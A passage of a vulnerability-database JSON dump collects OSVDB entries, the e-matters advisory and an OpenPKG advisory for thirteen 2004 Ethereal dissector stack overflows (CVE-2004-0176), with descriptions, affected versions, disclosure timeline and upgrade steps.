6887](https://vulners.com/osvdb/OSVDB:6887)\n[Related OSVDB ID: 6889](https://vulners.com/osvdb/OSVDB:6889)\n[Related OSVDB ID: 6896](https://vulners.com/osvdb/OSVDB:6896)\n[Related OSVDB ID: 6894](https://vulners.com/osvdb/OSVDB:6894)\n[Related OSVDB ID: 6895](https://vulners.com/osvdb/OSVDB:6895)\n[Related OSVDB ID: 6898](https://vulners.com/osvdb/OSVDB:6898)\n[Related OSVDB ID: 6890](https://vulners.com/osvdb/OSVDB:6890)\n[Related OSVDB ID: 6891](https://vulners.com/osvdb/OSVDB:6891)\n[Related OSVDB ID: 6892](https://vulners.com/osvdb/OSVDB:6892)\nRedHat RHSA: RHSA-2004:136-09\nRedHat RHSA: RHSA-2004:137-07\nOther Advisory URL: http://security.e-matters.de/advisories/032004.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-03/0227.html\nISS X-Force ID: 15569\n[CVE-2004-0176](https://vulners.com/cve/CVE-2004-0176)\n", "reporter": "Stefan Esser(sesser@hardened-php.net)", "published": "2001-10-08T00:00:00", "title": "Ethereal UCP Dissector Handle Int-Field Overflow", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Ethereal", "version": "0.8.20", "operator": "eq"}, {"name": "Ethereal", "version": "0.8.16", "operator": "eq"}, {"name": "Ethereal", "version": "0.8.15", "operator": "eq"}, {"name": "Ethereal", "version": "0.8.14", "operator": "eq"}, {"name": "Ethereal", "version": "0.8.19", "operator": "eq"}, {"name": "Ethereal", "version": "0.8.18", "operator": "eq"}, {"name": "Ethereal", "version": "0.8.17-a", "operator": "eq"}], "cvelist": ["CVE-2004-0176"], "modified": "2001-10-08T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:6897", "id": "OSVDB:6897", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:19:59", "references": [], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in Ethereal. The NetFlow v9 Dissector fails to check the bounds of the template_entry variable resulting in a caching overflow. With a specially crafted request, an attacker can cause a buffer overflow resulting in a loss of integrity.\n\n## Solution Description\nUpgrade to version 0.9.10 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: Disable the dissector\n## Short Description\nA remote overflow exists in Ethereal. The NetFlow v9 Dissector fails to check the bounds of the template_entry variable resulting in a caching overflow. With a specially crafted request, an attacker can cause a buffer overflow resulting in a loss of integrity.\n\n## References:\nVendor URL: http://www.ethereal.com/\n[Vendor Specific Advisory URL](http://www.debian.org/security/2004/dsa-511)\n[Vendor Specific Advisory URL](http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:024)\n[Vendor Specific Advisory URL](http://www.ethereal.com/appnotes/enpa-sa-00013.html)\n[Vendor Specific Advisory URL](http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000835)\n[Secunia Advisory ID:11744](https://secuniaresearch.flexerasoftware.com/advisories/11744/)\n[Related OSVDB ID: 6888](https://vulners.com/osvdb/OSVDB:6888)\n[Related OSVDB ID: 6893](https://vulners.com/osvdb/OSVDB:6893)\n[Related OSVDB ID: 6887](https://vulners.com/osvdb/OSVDB:6887)\n[Related OSVDB ID: 6889](https://vulners.com/osvdb/OSVDB:6889)\n[Related OSVDB ID: 6896](https://vulners.com/osvdb/OSVDB:6896)\n[Related OSVDB ID: 6894](https://vulners.com/osvdb/OSVDB:6894)\n[Related OSVDB ID: 6895](https://vulners.com/osvdb/OSVDB:6895)\n[Related OSVDB ID: 6898](https://vulners.com/osvdb/OSVDB:6898)\n[Related OSVDB ID: 6890](https://vulners.com/osvdb/OSVDB:6890)\n[Related OSVDB ID: 6891](https://vulners.com/osvdb/OSVDB:6891)\n[Related OSVDB ID: 6892](https://vulners.com/osvdb/OSVDB:6892)\n[Related OSVDB ID: 6897](https://vulners.com/osvdb/OSVDB:6897)\nRedHat RHSA: RHSA-2004:136-09\nRedHat RHSA: RHSA-2004:137-07\nOther Advisory URL: http://security.e-matters.de/advisories/032004.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-03/0227.html\nISS X-Force ID: 15569\n[CVE-2004-0176](https://vulners.com/cve/CVE-2004-0176)\n", "reporter": "Stefan Esser(sesser@hardened-php.net)", "published": "2004-03-23T00:00:00", "type": "osvdb", "title": "Ethereal NetFlow v9 Dissector Template Caching Overflow", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Ethereal", "version": "0.8.20", "operator": "eq"}, {"name": "Ethereal", "version": "0.9.5", "operator": "eq"}, {"name": "Ethereal", "version": "0.8.16", "operator": "eq"}, {"name": "Ethereal", "version": "0.8.15", "operator": "eq"}, {"name": "Ethereal", "version": "0.8.14", "operator": "eq"}, {"name": "Ethereal", "version": "0.9.1", "operator": "eq"}, {"name": "Ethereal", "version": "0.9.4", "operator": "eq"}, {"name": "Ethereal", "version": "0.9.2", "operator": "eq"}, {"name": "Ethereal", "version": "0.9.0", "operator": "eq"}, {"name": "Ethereal", "version": "0.9.7", "operator": "eq"}, {"name": "Ethereal", "version": "0.9.3", "operator": "eq"}, {"name": "Ethereal", "version": "0.8.19", "operator": "eq"}, {"name": "Ethereal", "version": "0.9.6", "operator": "eq"}, {"name": "Ethereal", "version": "0.9.8", "operator": "eq"}, {"name": "Ethereal", "version": "0.8.18", "operator": "eq"}, {"name": "Ethereal", "version": "0.8.17-a", "operator": "eq"}, {"name": "Ethereal", "version": "0.9.9", "operator": "eq"}], "cvelist": ["CVE-2004-0176"], "modified": "2004-03-23T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:4490", "id": "OSVDB:4490", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:01", "references": [], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in Ethereal. The IGAP Protocol Dissector fails to check the bounds of the \"accountname\" variable resulting in a stack overflow. With a specially crafted request, an attacker can potentially execute arbitrary code resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 0.10.0 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: Disable the dissector\n## Short Description\nA remote overflow exists in Ethereal. The IGAP Protocol Dissector fails to check the bounds of the \"accountname\" variable resulting in a stack overflow. With a specially crafted request, an attacker can potentially execute arbitrary code resulting in a loss of integrity.\n## References:\nVendor URL: http://www.ethereal.com/\n[Vendor Specific Advisory URL](http://www.debian.org/security/2004/dsa-511)\n[Vendor Specific Advisory URL](http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:024)\n[Vendor Specific Advisory URL](http://www.ethereal.com/appnotes/enpa-sa-00013.html)\n[Vendor Specific Advisory URL](http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000835)\n[Secunia Advisory ID:11744](https://secuniaresearch.flexerasoftware.com/advisories/11744/)\n[Related OSVDB ID: 6888](https://vulners.com/osvdb/OSVDB:6888)\n[Related OSVDB ID: 6893](https://vulners.com/osvdb/OSVDB:6893)\n[Related OSVDB ID: 4490](https://vulners.com/osvdb/OSVDB:4490)\n[Related OSVDB ID: 6889](https://vulners.com/osvdb/OSVDB:6889)\n[Related OSVDB ID: 6896](https://vulners.com/osvdb/OSVDB:6896)\n[Related OSVDB ID: 6894](https://vulners.com/osvdb/OSVDB:6894)\n[Related OSVDB ID: 6895](https://vulners.com/osvdb/OSVDB:6895)\n[Related OSVDB ID: 6898](https://vulners.com/osvdb/OSVDB:6898)\n[Related OSVDB ID: 6890](https://vulners.com/osvdb/OSVDB:6890)\n[Related OSVDB ID: 6891](https://vulners.com/osvdb/OSVDB:6891)\n[Related OSVDB ID: 6892](https://vulners.com/osvdb/OSVDB:6892)\n[Related OSVDB ID: 6897](https://vulners.com/osvdb/OSVDB:6897)\nRedHat RHSA: RHSA-2004:136-09\nRedHat RHSA: RHSA-2004:137-07\nOther Advisory URL: http://security.e-matters.de/advisories/032004.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-03/0227.html\nISS X-Force ID: 15569\n[CVE-2004-0176](https://vulners.com/cve/CVE-2004-0176)\n", "reporter": "Stefan Esser(sesser@hardened-php.net)", "published": "2003-12-10T00:00:00", "title": "Ethereal IGAP Protocol Dissector Account Overflow", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Ethereal", "version": "0.8.20", "operator": "eq"}, {"name": "Ethereal", "version": "0.8.16", "operator": "eq"}, {"name": "Ethereal", "version": "0.8.15", "operator": "eq"}, {"name": "Ethereal", "version": "0.8.14", "operator": "eq"}, {"name": "Ethereal", "version": "0.8.19", "operator": "eq"}, {"name": "Ethereal", "version": "0.9.x", "operator": "eq"}, {"name": "Ethereal", "version": "0.8.18", "operator": "eq"}, {"name": "Ethereal", "version": "0.8.17-a", "operator": "eq"}], "cvelist": ["CVE-2004-0176"], "modified": "2003-12-10T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:6887", "id": "OSVDB:6887", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:01", "references": [], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in Ethereal. The TCAP Dissector fails to check the bounds of the ASN.1 encoded Transaction ID resulting in a stack overflow. With a specially crafted request, an attacker can execute arbitrary coderesulting in a loss of integrity.\n## Solution Description\nUpgrade to version 0.9.16 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: Disable the dissector\n## Short Description\nA remote overflow exists in Ethereal. The TCAP Dissector fails to check the bounds of the ASN.1 encoded Transaction ID resulting in a stack overflow. With a specially crafted request, an attacker can execute arbitrary coderesulting in a loss of integrity.\n## References:\nVendor URL: http://www.ethereal.com/\n[Vendor Specific Advisory URL](http://www.debian.org/security/2004/dsa-511)\n[Vendor Specific Advisory URL](http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:024)\n[Vendor Specific Advisory URL](http://www.ethereal.com/appnotes/enpa-sa-00013.html)\n[Vendor Specific Advisory URL](http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000835)\n[Secunia Advisory ID:11744](https://secuniaresearch.flexerasoftware.com/advisories/11744/)\n[Related OSVDB ID: 6888](https://vulners.com/osvdb/OSVDB:6888)\n[Related OSVDB ID: 6893](https://vulners.com/osvdb/OSVDB:6893)\n[Related OSVDB ID: 4490](https://vulners.com/osvdb/OSVDB:4490)\n[Related OSVDB ID: 6887](https://vulners.com/osvdb/OSVDB:6887)\n[Related OSVDB ID: 6889](https://vulners.com/osvdb/OSVDB:6889)\n[Related OSVDB ID: 6896](https://vulners.com/osvdb/OSVDB:6896)\n[Related OSVDB ID: 6894](https://vulners.com/osvdb/OSVDB:6894)\n[Related OSVDB ID: 6898](https://vulners.com/osvdb/OSVDB:6898)\n[Related OSVDB ID: 6890](https://vulners.com/osvdb/OSVDB:6890)\n[Related OSVDB ID: 6891](https://vulners.com/osvdb/OSVDB:6891)\n[Related OSVDB ID: 6892](https://vulners.com/osvdb/OSVDB:6892)\n[Related OSVDB ID: 6897](https://vulners.com/osvdb/OSVDB:6897)\nRedHat RHSA: RHSA-2004:136-09\nRedHat RHSA: RHSA-2004:137-07\nOther Advisory URL: http://security.e-matters.de/advisories/032004.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-03/0227.html\nISS X-Force ID: 15569\n[CVE-2004-0176](https://vulners.com/cve/CVE-2004-0176)\n", "reporter": "Stefan Esser(sesser@hardened-php.net)", "published": "2003-10-02T00:00:00", "title": "Ethereal TCAP Dissector TID Overflow", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Ethereal", "version": "0.9.5", "operator": "eq"}, {"name": "Ethereal", "version": "0.9.14", "operator": "eq"}, {"name": "Ethereal", "version": "0.9.12", "operator": "eq"}, {"name": "Ethereal", "version": "0.9.10", "operator": "eq"}, {"name": "Ethereal", "version": "0.9.1", "operator": "eq"}, {"name": "Ethereal", "version": "0.9.4", "operator": "eq"}, {"name": "Ethereal", "version": "0.9.11", "operator": "eq"}, {"name": "Ethereal", "version": "0.9.2", "operator": "eq"}, {"name": "Ethereal", "version": "0.9.0", "operator": "eq"}, {"name": "Ethereal", "version": "0.9.7", "operator": "eq"}, {"name": "Ethereal", "version": "0.9.3", "operator": "eq"}, {"name": "Ethereal", "version": "0.9.6", "operator": "eq"}, {"name": "Ethereal", "version": "0.8.x", "operator": "eq"}, {"name": "Ethereal", "version": "0.9.8", "operator": "eq"}, {"name": "Ethereal", "version": "0.9.9", "operator": "eq"}, {"name": "Ethereal", "version": "0.9.15", "operator": "eq"}, {"name": "Ethereal", "version": "0.9.13", "operator": "eq"}], "cvelist": ["CVE-2004-0176"], "modified": "2003-10-02T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:6895", "id": "OSVDB:6895", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:09", "references": [], "description": " e-matters GmbH\r\n www.e-matters.de\r\n\r\n -= Security Advisory =-\r\n\r\n\r\n\r\n Advisory: Multiple (13) Ethereal remote overflows\r\n Release Date: 2004/03/23\r\nLast Modified: 2004/03/23\r\n Author: Stefan Esser [s.esser@e-matters.de]\r\n\r\n Application: Ethereal 0.8.14 - 0.10.2\r\n Severity: 13 remotely triggerable vulnerabilities were \r\n discovered in the multiprotocol packet sniffer \r\n Ethereal that allow remote compromise\r\n Risk: Critical\r\nVendor Status: Plans to release a fixed version within this week\r\n Reference: http://security.e-matters.de/advisories/032004.html\r\n\r\n\r\nOverview:\r\n\r\n Quote from http://www.ethereal.com\r\n \r\n "Ethereal is used by network professionals around the world for \r\n troubleshooting, analysis, software and protocol development, and \r\n education. It has all of the standard features you would expect in \r\n a protocol analyzer, and several features not seen in any other \r\n product. Its open source license allows talented experts in the \r\n networking community to add enhancements. It runs on all popular \r\n computing platforms, including Unix, Linux, and Windows."\r\n \r\n During a code audit of Ethereal thirteen remotely triggerable stack-\r\n overflows where discovered. The vulnerable dissectors in question\r\n are namely: BGP, EIGRP, IGAP, IRDA, ISUP, NetFlow, PGM, TCAP and UCP.\r\n \r\n With the exception of 3 all discovered overflows allow arbitrary code\r\n execution by injecting carefully crafted packets to the sniffed wire\r\n or by convincing someone to load a malicious packet capture file into\r\n Ethereal.\r\n \r\n \r\nDetails:\r\n\r\n In the beginning of March a code audit of Ethereal revealed remotely\r\n triggerable overflows within a few of the over 400 dissectors. During\r\n the process of working with the Ethereal vendor the audit continued \r\n and until today it was possible to identify a total count of 13 \r\n possible stack overflows within 9 different dissectors. \r\n \r\n For the purpose of clarity it was choosen to describe all these bugs\r\n within this advisory instead of spreading the information over nine\r\n single advisories.\r\n \r\n Because the defects affect different parts of the code base and\r\n were introduced at different dates within the last 3 years the\r\n following table gives a short overview of the exact CVS commit\r\n timestamps and the version number it first appeared in.\r\n \r\n (Version 0.8.14)\r\n \r\n \r\n [04] EIGRP Dissector TLV_IP_INT Long IP Address Overflow\r\n - Revision: 1.7, Thu Nov 9 05:16:19 2000 UTC\r\n \r\n [05] EIGRP Dissector TLV_IP_EXT Long IP Address Overflow\r\n - Revision: 1.7, Thu Nov 9 05:16:19 2000 UTC\r\n \r\n \r\n (version 0.8.19)\r\n \r\n [06] PGM Dissector NakList Overflow\r\n - Revision: 1.1, Thu Jul 12 20:16:28 2001 UTC\r\n \r\n \r\n (version 0.9.0)\r\n \r\n [11] UCP Dissector Handle String-Field Overflow\r\n - Revision: 1.1, Mon Oct 8 17:30:23 2001 UTC\r\n \r\n [12] UCP Dissector Handle Int-Field Overflow\r\n - Revision: 1.1, Mon Oct 8 17:30:23 2001 UTC\r\n \r\n [13] UCP Dissector Handle Time-Field Overflow\r\n - Revision: 1.1, Mon Oct 8 17:30:23 2001 UTC\r\n \r\n \r\n (version 0.9.10)\r\n \r\n [01] Netflow v9 Dissector Template Caching Overflow\r\n - Revision 1.9 Tue Mar 4 03:37:12 2003 UTC\r\n \r\n \r\n (version 0.9.16)\r\n \r\n [09] ISUP Dissector INTERWORKING FUNCTION ADDRESS Overflow\r\n - Revision: 1.29, Fri Oct 3 20:58:13 2003 UTC\r\n \r\n [10] TCAP Dissector TID Overflow\r\n - Revision: 1.1, Thu Oct 2 06:13:28 2003 UTC\r\n \r\n \r\n (version 0.10.0)\r\n \r\n [02] IGAP Dissector Account Overflow \r\n - Revision 1.1 Wed Dec 10 19:21:55 2003 UTC\r\n \r\n [03] IGAP Dissector Message Overflow \r\n - Revision 1.1 Wed Dec 10 19:21:55 2003 UTC\r\n \r\n \r\n (version 0.10.1)\r\n \r\n [08] BGP Dissector MPLS Label Overflow\r\n - Revision: 1.84, Tue Jan 6 02:29:36 2004 UTC\r\n \r\n [07] IRDA Dissector Plugin IRCOM_PORT_NAME Overflow\r\n - Revision: 1.1, Thu Dec 18 19:07:12 2003 UTC\r\n \r\n \r\n \r\n In the following paragraphs all 13 bugs are described in a\r\n short form. The referenced URL within the header of this advisory\r\n will be updated with more detailed information (incl. snippets)\r\n when the Ethereal developers have released 0.10.3.\r\n\r\n \r\n [01] NetFlow v9 Dissector Template Caching Overflow\r\n ---------------------------------------------------\r\n \r\n Desc: When parsing the v9_template structure within a NetFlow\r\n UDP packet a template_entry count > 64 will overflow\r\n a stackbuffer and allows overwriting the saved instruction\r\n pointer, thus allowing remote code execution.\r\n\r\n\r\n [02] IGAP Protocol Dissector Account Overflow\r\n [03] IGAP Protocol Dissector Message Overflow\r\n ---------------------------------------------\r\n \r\n Desc: When parsing an IGAP protocol packet that contains either \r\n an overlong accountname (>17) or an overlong message (>65)\r\n different buffers may overflow the stack, allowing an over-\r\n write of up to 238 (or 190) bytes. In both cases remote \r\n code execution exploitation is possible.\r\n\r\n\r\n [04] EIGRP Protocol TLV_IP_INT Long IP Address Overflow\r\n -------------------------------------------------------\r\n\r\n Desc: When parsing an EIGRP IP packet that contains an overlong\r\n IP address this will overflow a stack buffer and therefore can\r\n lead to remote code execution\r\n\r\n \r\n [05] EIGRP Protocol TLV_IP_EXT Long IP Address Overflow\r\n -------------------------------------------------------\r\n\r\n Desc: When parsing an EIGRP Extended IP packet that contains an \r\n overlong extended IP address this will overflow a stack buffer \r\n and can lead to remote code execution\r\n\r\n\r\n [06] PGM Protocol NakList Overflow\r\n ----------------------------------\r\n\r\n Desc: When parsing an PGM packet with a carefully crafted NakList\r\n a possible integer underflow can result in a very small stack-\r\n overflow. Due to the stacklayout code execution exploitation\r\n seems very unlikely.\r\n\r\n\r\n [07] IRDA Protocol Plugin IRCOM_PORT_NAME Overflow\r\n --------------------------------------------------\r\n\r\n Desc: When parsing an IRCOM_PORT_NAME packed an overlong portname \r\n can overwrite up to 2 bytes on the stack. Similar to [06] the\r\n stacklayout seems to make remote code execution very difficult\r\n or impossible.\r\n \r\n\r\n [08] BGP Protocol MPLS Label Overflow\r\n -------------------------------------\r\n \r\n Desc: When parsing a BGP Packet with a MPLS IPv6 label up to 13 \r\n bytes on the stack may be overwritten with arbitrary data.\r\n Due to the stacklayout exploitability seems unlikly and was\r\n therefore not tested.\r\n \r\n\r\n [09] ISUP Protocol INTERWORKING FUNCTION ADDRESS Overflow\r\n ---------------------------------------------------------\r\n\r\n Desc: When parsing an ISUP Packet an oversized IWFA will overflow \r\n a stack buffer and can lead to remote code execution\r\n\r\n\r\n [10] TCAP Protocol TID Overflow\r\n -------------------------------\r\n \r\n Desc: When handling the ASN.1 encoded Transaction ID within a TCAP\r\n packet a 4 byte stack variable may overflow and can lead to\r\n remote code execution\r\n\r\n\r\n [11] UCP Protocol Handle String-Field Overflow\r\n ----------------------------------------------\r\n \r\n Desc: When handling a string within an UCP packet a stack buffer \r\n of BUFSIZ bytes may overflow and can therefore lead to \r\n remote code execution.\r\n To exploit this vulnerability over the wire an attacker must \r\n be able to fit more than BUFSIZ bytes into one TCP packet.\r\n This means it is only exploitable on the wire if the system\r\n has a MTU bigger than BUFSIZ. BUFSIZ is 8192 on glibc \r\n systems, 1024 on BSD systems and 512 on Windows systems.\r\n\r\n\r\n [12] UCP Protocol Handle Int-Field Overflow\r\n ----------------------------------------------\r\n \r\n Desc: When handling an Integer field within an UCP packet a stack \r\n buffer of BUFSIZ bytes may overflow and can therfore lead to \r\n remote code execution. \r\n To exploit this vulnerability over the wire an attacker must \r\n be able to fit more than BUFSIZ bytes into one TCP packet.\r\n This means it is only exploitable on the wire if the system\r\n has a MTU bigger than BUFSIZ. BUFSIZ is 8192 on glibc \r\n systems, 1024 on BSD systems and 512 on Windows systems.\r\n\r\n\r\n [13] UCP Protocol Handle Time-Field Overflow\r\n ----------------------------------------------\r\n \r\n Desc: When handling a Time field within an UCP packet a stack \r\n buffer of BUFSIZ bytes may overflow and can therefore lead \r\n to remote code execution.\r\n To exploit this vulnerability over the wire an attacker must \r\n be able to fit more than BUFSIZ bytes into one TCP packet.\r\n This means it is only exploitable on the wire if the system\r\n has a MTU bigger than BUFSIZ. BUFSIZ is 8192 on glibc \r\n systems, 1024 on BSD systems and 512 on Windows systems.\r\n\r\n\r\nProof of Concept:\r\n\r\n e-matters is not going to release an exploit for any of these \r\n vulnerabilities to the public. \r\n \r\n\r\nDisclosure Timeline:\r\n\r\n 5. March 2004 - Ethereal developers were contacted by email\r\n telling them about 10(of the 13) holes.\r\n 6 holes were closed the same day EIGRP, IGAP,\r\n ISUP and BGP.\r\n 7. March 2004 - IRDA hole closed (after checking specs)\r\n 8. March 2004 - PGM hole closed (after checking specs)\r\n 9. March 2004 - NetFlow hole closed (after checking specs)\r\n 17. March 2004 - UCP holes were discovered and mailed to vendor\r\n 19. March 2004 - UCP and TCAP holes closed (after checking specs)\r\n 22. March 2004 - Ethereal developers have releases a mini advisory\r\n urging their users to upgrade to version 0.10.3\r\n which will be released later this week\r\n 23. March 2004 - Public Disclosure\r\n\r\n\r\nCVE Information:\r\n\r\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has\r\n assigned the name CAN-2004-0176 to this issue.\r\n\r\n\r\nRecommendation:\r\n\r\n Until you can upgrade to version 0.10.3 of Ethereal or to the \r\n bugfixed package from your distributor it is strongly recommended\r\n to disable the following dissectors in the menu:\r\n \r\n Analyze->Enabled Protocols\r\n \r\n disable: BGP, EIGRP, IGAP, IRDA, ISUP, NetFlow, PGM, TCAP, UCP\r\n \r\n \r\nGPG-Key:\r\n\r\n http://security.e-matters.de/gpg_key.asc\r\n \r\n pub 1024D/75E7AAD6 2002-02-26 e-matters GmbH - Securityteam\r\n Key fingerprint = 43DD 843C FAB9 832A E5AB CAEB 81F2 8110 75E7 AAD6\r\n\r\n\r\nCopyright 2004 Stefan Esser. All rights reserved.\r\n\r\n\r\n-- \r\n\r\n--------------------------------------------------------------------------\r\n Stefan Esser s.esser@e-matters.de\r\n e-matters Security http://security.e-matters.de/\r\n\r\n GPG-Key gpg --keyserver pgp.mit.edu --recv-key 0xCF6CAE69 \r\n Key fingerprint B418 B290 ACC0 C8E5 8292 8B72 D6B0 7704 CF6C AE69\r\n--------------------------------------------------------------------------\r\n Did I help you? Consider a gift: http://wishlist.suspekt.org/\r\n--------------------------------------------------------------------------\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2004-03-24T00:00:00", "title": "Advisory 03/2004: Multiple (13) Ethereal remote overflows", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:09", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2004-0176"], "modified": "2004-03-24T00:00:00", "id": "SECURITYVULNS:DOC:5954", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:5954", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:09", "references": [], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n________________________________________________________________________\r\n\r\nOpenPKG Security Advisory The OpenPKG Project\r\nhttp://www.openpkg.org/security.html http://www.openpkg.org\r\nopenpkg-security@openpkg.org openpkg@openpkg.org\r\nOpenPKG-SA-2004.015 16-Apr-2004\r\n________________________________________________________________________\r\n\r\nPackage: ethereal\r\nVulnerability: arbitrary code execution\r\nOpenPKG Specific: no\r\n\r\nAffected Releases: Affected Packages: Corrected Packages:\r\nOpenPKG CURRENT <= ethereal-0.10.2-20040329 >= ethereal-0.10.3-20040330\r\nOpenPKG 2.0 <= ethereal-0.10.0a-2.0.0 >= ethereal-0.10.0a-2.0.1\r\nOpenPKG 1.3 <= ethereal-0.9.14-1.3.0 >= ethereal-0.9.14-1.3.1\r\n\r\nDependent Packages: none\r\n\r\nDescription:\r\n According to a vendor security advisory [0] based on hints from Stefan\r\n Esser and Jonathan Heussser, several vulnerabilities of various types\r\n exist in the Ethereal network protocol analyzer [1]. Namely, it may be\r\n possible to make Ethereal crash or run arbitrary code by injecting a\r\n purposefully malformed packet onto the wire, by convincing someone to\r\n read a malformed packet trace file, or by creating a malformed color\r\n filter file.\r\n\r\n The Common Vulnerabilities and Exposures (CVE) project assigned the\r\n identifiers CAN-2004-0176 [2] and CAN-2004-0365 [3] to the problems\r\n concerning protocol dissectors and RADIUS packets.\r\n\r\n The zero-length presentation protocol selector vulnerability named in\r\n the Ethereal vendor advisory does not affect OpenPKG though, because\r\n such presentation protocol selectors are not implemented in any\r\n Ethereal versions released by OpenPKG.\r\n\r\n Please check whether you are affected by running "<prefix>/bin/rpm\r\n -q ethereal". If you have the "ethereal" package installed and its\r\n version is affected (see above), we recommend that you immediately\r\n upgrade it (see Solution) [4][5].\r\n\r\nSolution:\r\n Select the updated source RPM appropriate for your OpenPKG release\r\n [6][7], fetch it from the OpenPKG FTP service [8][9] or a mirror\r\n location, verify its integrity [10], build a corresponding binary\r\n RPM from it [4] and update your OpenPKG installation by applying the\r\n binary RPM [5]. For the most recent release OpenPKG 2.0, perform the\r\n following operations to permanently fix the security problem (for\r\n other releases adjust accordingly).\r\n\r\n $ ftp ftp.openpkg.org\r\n ftp> bin\r\n ftp> cd release/2.0/UPD\r\n ftp> get ethereal-0.10.0a-2.0.1.src.rpm\r\n ftp> bye\r\n $ <prefix>/bin/openpkg rpm -v --checksig ethereal-0.10.0a-2.0.1.src.rpm\r\n $ <prefix>/bin/openpkg rpm --rebuild ethereal-0.10.0a-2.0.1.src.rpm\r\n $ su -\r\n # <prefix>/bin/openpkg rpm -Fvh <prefix>/RPM/PKG/ethereal-0.10.0a-2.0.1.*.rpm\r\n________________________________________________________________________\r\n\r\nReferences:\r\n [0] http://www.ethereal.com/appnotes/enpa-sa-00013.html\r\n [1] http://www.ethereal.com/\r\n [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0176\r\n [3] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0365\r\n [4] http://www.openpkg.org/tutorial.html#regular-source\r\n [5] http://www.openpkg.org/tutorial.html#regular-binary\r\n [6] ftp://ftp.openpkg.org/release/1.3/UPD/ethereal-0.9.14-1.3.1.src.rpm\r\n [7] ftp://ftp.openpkg.org/release/2.0/UPD/ethereal-0.10.0a-2.0.1.src.rpm\r\n [8] ftp://ftp.openpkg.org/release/1.3/UPD/\r\n [9] ftp://ftp.openpkg.org/release/2.0/UPD/\r\n [10] http://www.openpkg.org/security.html#signature\r\n________________________________________________________________________\r\n\r\nFor security reasons, this advisory was digitally signed with the\r\nOpenPGP public key "OpenPKG <openpkg@openpkg.org>" (ID 63C4CB9F) of the\r\nOpenPKG project which you can retrieve from http://pgp.openpkg.org and\r\nhkp://pgp.openpkg.org. Follow the instructions on http://pgp.openpkg.org/\r\nfor details on how to verify the integrity of this advisory.\r\n________________________________________________________________________\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nComment: OpenPKG <openpkg@openpkg.org>\r\n\r\niD8DBQFAgAEggHWT4GPEy58RAi9aAKDnBOkyWmBg0h7oUnW+7xu2C6gQRgCgj7lc\r\nMG/GWc5NEXxBIA+9w+H21mg=\r\n=VIHq\r\n-----END PGP SIGNATURE-----", "edition": 1, "reporter": "Securityvulns", "published": "2004-06-05T00:00:00", "title": "[OpenPKG-SA-2004.015] OpenPKG Security Advisory (ethereal)", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:09", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2004-0365", "CVE-2004-0176"], "modified": "2004-06-05T00:00:00", "id": "SECURITYVULNS:DOC:6297", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:6297", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "nessus": [{"lastseen": "2018-09-01T23:58:59", "references": ["http://www.debian.org/security/2004/dsa-511"], "pluginID": "15348", "description": "Several buffer overflow vulnerabilities were discovered in ethereal, a network traffic analyzer. These vulnerabilities are described in the ethereal advisory 'enpa-sa-00013'. Of these, only some parts of CAN-2004-0176 affect the version of ethereal in Debian woody.\nCAN-2004-0367 and CAN-2004-0365 are not applicable to this version.", "edition": 6, "reporter": "Tenable", "published": "2004-09-29T00:00:00", "title": "Debian DSA-511-1 : ethereal - buffer overflows", "type": 